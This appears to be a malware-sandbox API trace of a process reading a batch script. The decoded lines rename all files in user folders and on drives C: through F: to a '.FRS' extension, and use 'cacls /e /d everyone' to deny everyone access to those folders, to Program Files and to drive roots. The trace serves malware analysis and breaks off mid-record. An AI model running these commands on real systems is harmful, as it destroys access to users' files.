dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0091.554] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.554] GetFileType (hFile=0x2a0) returned 0x1 [0091.554] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0091.554] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0091.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0091.555] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.555] GetFileType (hFile=0x2a0) returned 0x1 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0091.555] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0091.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0091.555] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.555] GetFileType (hFile=0x2a0) returned 0x1 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0091.555] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0091.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0091.555] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.555] GetFileType (hFile=0x2a0) returned 0x1 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0091.555] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0091.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0091.555] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.555] GetFileType (hFile=0x2a0) returned 0x1 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0091.555] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0091.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0091.555] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0091.556] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.556] GetFileType (hFile=0x2a0) returned 0x1 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0091.556] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=483, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0091.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" *.*.FRS\r\n") returned 48 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0091.556] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.556] GetFileType (hFile=0x2a0) returned 0x1 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1e3 [0091.556] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=518, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0091.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\Public\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 35 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0091.556] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.556] GetFileType (hFile=0x2a0) returned 0x1 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x206 [0091.556] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0091.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\*.*\" *.*.FRS\r\n.*\" *.*.FRS\r\n") returned 22 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0091.556] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.556] GetFileType (hFile=0x2a0) returned 0x1 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21c [0091.556] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=562, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0091.556] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"D:\\*.*\" *.*.FRS\r\n") returned 22 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0091.556] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.556] GetFileType (hFile=0x2a0) returned 0x1 [0091.556] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x232 [0091.557] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=584, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0091.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"E:\\*.*\" *.*.FRS\r\n") returned 22 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0091.557] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.557] GetFileType (hFile=0x2a0) returned 0x1 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x248 [0091.557] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0091.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"F:\\*.*\" *.*.FRS\r\n") returned 22 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0091.557] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.557] GetFileType (hFile=0x2a0) returned 0x1 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x25e [0091.557] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0091.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0091.557] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.557] GetFileType (hFile=0x2a0) returned 0x1 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0091.557] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0091.557] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=67, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" /e /d everyone\r\n=%%i\r\n") returned 67 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0091.557] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.557] GetFileType (hFile=0x2a0) returned 0x1 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e0 [0091.557] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.557] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=797, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0091.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=61, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Links\\*.*\" /e /d everyone\r\nyone\r\n") returned 61 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0091.558] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.558] GetFileType (hFile=0x2a0) returned 0x1 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31d [0091.558] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0091.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=65, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" /e /d everyone\r\n\r\n") returned 65 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0091.558] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.558] GetFileType (hFile=0x2a0) returned 0x1 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x35e [0091.558] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=926, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0091.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Searches\\*.*\" /e /d everyone\r\n\n") returned 64 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0091.558] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.558] GetFileType (hFile=0x2a0) returned 0x1 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x39e [0091.558] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0091.558] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=62, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Videos\\*.*\" /e /d everyone\r\n\r\n") returned 62 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0091.558] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.558] GetFileType (hFile=0x2a0) returned 0x1 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0091.558] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.558] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0091.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0091.559] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.559] GetFileType (hFile=0x2a0) returned 0x1 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0091.559] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0091.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0091.559] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.559] GetFileType (hFile=0x2a0) returned 0x1 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0091.559] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0091.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0091.559] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.559] GetFileType (hFile=0x2a0) returned 0x1 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0091.559] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0091.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0091.559] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.559] GetFileType (hFile=0x2a0) returned 0x1 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0091.559] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0091.559] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0091.559] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0091.559] _get_osfhandle (_FileHandle=3) returned 0x2a0 [0091.560] GetFileType (hFile=0x2a0) returned 0x1 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0091.560] ReadFile (in: hFile=0x2a0, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0091.560] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=1269, 